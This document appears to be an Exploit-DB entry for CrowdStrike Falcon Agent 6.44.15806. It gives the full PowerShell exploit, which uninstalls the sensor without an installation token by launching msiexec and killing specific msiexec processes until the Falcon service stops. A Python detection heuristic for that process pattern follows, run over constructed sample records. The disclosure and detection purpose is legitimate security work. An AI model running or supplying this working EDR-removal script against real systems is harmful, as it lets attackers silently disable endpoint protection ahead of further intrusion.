Vendor: Falcon AGENT
By: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
CVSS: 2.7 (LOW)
Title: Uninstall without Installation Token
CWE: 284
Product Name: Falcon AGENT
Affected Version From: 6.44.15806
Affected Version To: 6.44.15806
Patch Exists: YES
Related CVEs: CVE-2022-2841, CVE-2022-44721
CPE: a:crowdstrike:falcon_agent
Metasploit:
Platforms Tested: All Windows versions
Year: 2022

CrowdStrike Falcon AGENT 6.44.15806 – Uninstall without Installation Token

This exploit allows an attacker to uninstall CrowdStrike Falcon AGENT 6.44.15806 without an installation token. It is based on CVE-2022-2841 and was modified by Deda Cloud Purple Team members to work against the hotfixed release. The publication of CVE-2022-44721 is in progress.

Mitigation:

Organizations should ensure that they are running the latest version of the CrowdStrike Falcon AGENT and that they have implemented the necessary security measures to protect their systems from unauthorized access.

Exploit-DB raw data:

# Exploit Title: CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token
# Date: 30/11/2022
# Exploit Author: Walter Oberacher, Raffaele Nacca, Davide Bianchin, Fortunato Lodari, Luca Bernardi (Deda Cloud Cybersecurity Team)
# Vendor Homepage: https://www.crowdstrike.com/
# Author Homepage: https://www.deda.cloud/
# Tested On: All Windows versions
# Version: 6.44.15806
# CVE: Based on CVE-2022-2841; modified by Deda Cloud Purple Team members to exploit the hotfixed release. Publication of CVE-2022-44721 in progress.


# Locate the sensor's product code (uninstall GUID) under the Uninstall registry key
$InstalledSoftware = Get-ChildItem "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall"

foreach($obj in $InstalledSoftware){
    if ("CrowdStrike Sensor Platform" -eq $obj.GetValue('DisplayName'))
    {
        # Key name is HKEY_LOCAL_MACHINE\...\Uninstall\{GUID}; element 6 is the GUID
        $uninstall_uuid = $obj.Name.Split("\")[6]
    }
}

# PIDs of msiexec instances seen so far
$g_msiexec_instances = New-Object System.Collections.ArrayList

Write-Host "[+] Identified installed Falcon: $uninstall_uuid"
Write-Host "[+] Running uninstaller for Crowdstrike Falcon . . ."
Start-Process "msiexec" -ArgumentList "/X$uninstall_uuid"

# Poll msiexec instances for as long as the sensor service is still running
while($true)
{
    if (Get-Process -Name "CSFalconService") {
        Get-Process | Where-Object { $_.Name -eq "msiexec" } | ForEach-Object {
            if (-Not $g_msiexec_instances.Contains($_.Id)){
                [void]$g_msiexec_instances.Add($_.Id)
                # The 4th and 5th msiexec instances are terminated shortly after they appear
                if (4 -eq $g_msiexec_instances.Count -or 5 -eq $g_msiexec_instances.Count){
                    Start-Sleep -Milliseconds 100
                    Write-Host "[+] Killing PID $($g_msiexec_instances[-1])"
                    Stop-Process -Force -Id $g_msiexec_instances[-1]
                }
            }
        }
    } else {
        Write-Host "[+] CSFalconService process vanished...reboot and have fun!"
        break
    }
}
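Added here as a defender-side illustration, not part of the Exploit-DB entry: a Python heuristic that runs over Sysmon-style process create/terminate records (event IDs 1 and 5) and flags an msiexec uninstall during which msiexec instances are killed moments after starting and the CSFalconService process exits. The ProcEvent shape, the time thresholds and the sample records are all constructed assumptions, not real telemetry.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    ts: float        # seconds since epoch
    event_id: int    # Sysmon event ID: 1 = process create, 5 = process terminate
    image: str       # executable file name
    pid: int
    cmdline: str = ""

def detect_uninstall_bypass(events: list, window: float = 60.0,
                            short_life: float = 2.0) -> list:
    """Flag an msiexec uninstall (/X) during which msiexec instances died within
    `short_life` seconds of starting and CSFalconService.exe exited (heuristic)."""
    started = {}                                   # pid -> create event
    lifetimes, sensor_exits, launches = [], [], []
    for ev in sorted(events, key=lambda e: e.ts):
        img = ev.image.lower()
        if ev.event_id == 1:
            started[ev.pid] = ev
            if img == "msiexec.exe" and "/x" in ev.cmdline.lower():
                launches.append(ev)                # uninstall launched
        elif ev.event_id == 5:
            if img == "csfalconservice.exe":
                sensor_exits.append(ev.ts)         # sensor service gone
            start = started.pop(ev.pid, None)
            if start is not None:
                lifetimes.append((start.ts, ev.ts, img))
    findings = []
    for launch in launches:
        end = launch.ts + window
        killed = [(s, e) for s, e, img in lifetimes if img == "msiexec.exe"
                  and launch.ts <= s and e <= end and e - s < short_life]
        exits = [t for t in sensor_exits if launch.ts <= t <= end]
        if killed and exits:
            findings.append({"launch_ts": launch.ts, "cmdline": launch.cmdline,
                             "killed_msiexec": len(killed), "sensor_exit_ts": exits[0]})
    return findings

def sample_events() -> list:
    """Constructed records mimicking the sequence the script above produces."""
    code = "{PRODUCT-CODE-PLACEHOLDER}"  # placeholder, not a real product code
    return [
        ProcEvent(100.0, 1, "msiexec.exe", 1000, f"msiexec /X{code}"),
        ProcEvent(100.5, 1, "msiexec.exe", 1001), ProcEvent(101.0, 1, "msiexec.exe", 1002),
        ProcEvent(101.5, 1, "msiexec.exe", 1003), ProcEvent(101.6, 5, "msiexec.exe", 1003),
        ProcEvent(102.0, 1, "msiexec.exe", 1004), ProcEvent(102.1, 5, "msiexec.exe", 1004),
        ProcEvent(110.0, 5, "CSFalconService.exe", 500), ProcEvent(120.0, 5, "msiexec.exe", 1000),
    ]
```

A normal uninstall, where msiexec instances run to completion and the sensor service keeps running, produces no finding.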